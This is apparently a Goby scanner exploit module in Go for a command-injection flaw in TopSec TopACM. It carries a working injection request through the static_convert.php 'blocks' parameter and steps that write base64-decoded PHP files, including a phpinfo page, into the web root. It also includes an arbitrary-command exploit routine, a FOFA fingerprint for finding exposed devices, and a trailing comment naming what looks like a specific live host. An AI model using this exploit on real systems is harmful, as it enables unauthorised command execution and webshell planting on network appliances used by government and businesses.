1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + "git.gobies.org/goby/goscanner/jsonvul" 6 + "git.gobies.org/goby/goscanner/scanconfig" 7 + "git.gobies.org/goby/httpclient" 8 + "net/url" 9 + "strings" 10 + ) 11 + 12 + func init() { 13 + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"[email protected]","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁,请关注官方更新。<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` 14 + 15 + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { 16 + // 攻击 URL 17 + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) 18 + requestConfig.VerifyTls = false 19 + requestConfig.FollowRedirect = false 20 + requestConfig.Timeout = 15 21 + 22 + // 发送攻击请求 23 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 24 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { 25 + return true 26 + } 27 + } 28 + return false 29 + } 30 + 31 + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { 32 + // 攻击 URL 33 + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") 34 + requestConfig.VerifyTls = false 35 + requestConfig.FollowRedirect = false 36 + requestConfig.Timeout = 15 37 + 38 + // 发送攻击请求 39 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 40 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { 41 + return true 42 + } 43 + } 44 + return false 45 + } 46 + 47 + ExpManager.AddExploit(NewExploit( 48 + goutils.GetFileName(), 49 + expJson, 50 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 51 + 52 + // 生成随机文件名 53 + randomFileName := goutils.RandomHexString(6) 54 + 55 + // 漏洞攻击包,POC 使用自删除的文件 56 + // <?php echo md5(233);unlink(__FILE__); 57 + if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) { 58 + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) 59 + } 60 + 61 + return false 62 + }, 63 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 64 + 65 + cmd := ss.Params["cmd"].(string) 66 + 67 + if exploitTopACM092348783482(cmd, expResult.HostInfo) { 68 + expResult.Success = true 69 + expResult.Output = "命令执行成功" 70 + } 71 + 72 + return expResult 73 + }, 74 + )) 75 + } 76 + 77 + // https://heiwado.cn:8443/ -
-
-
-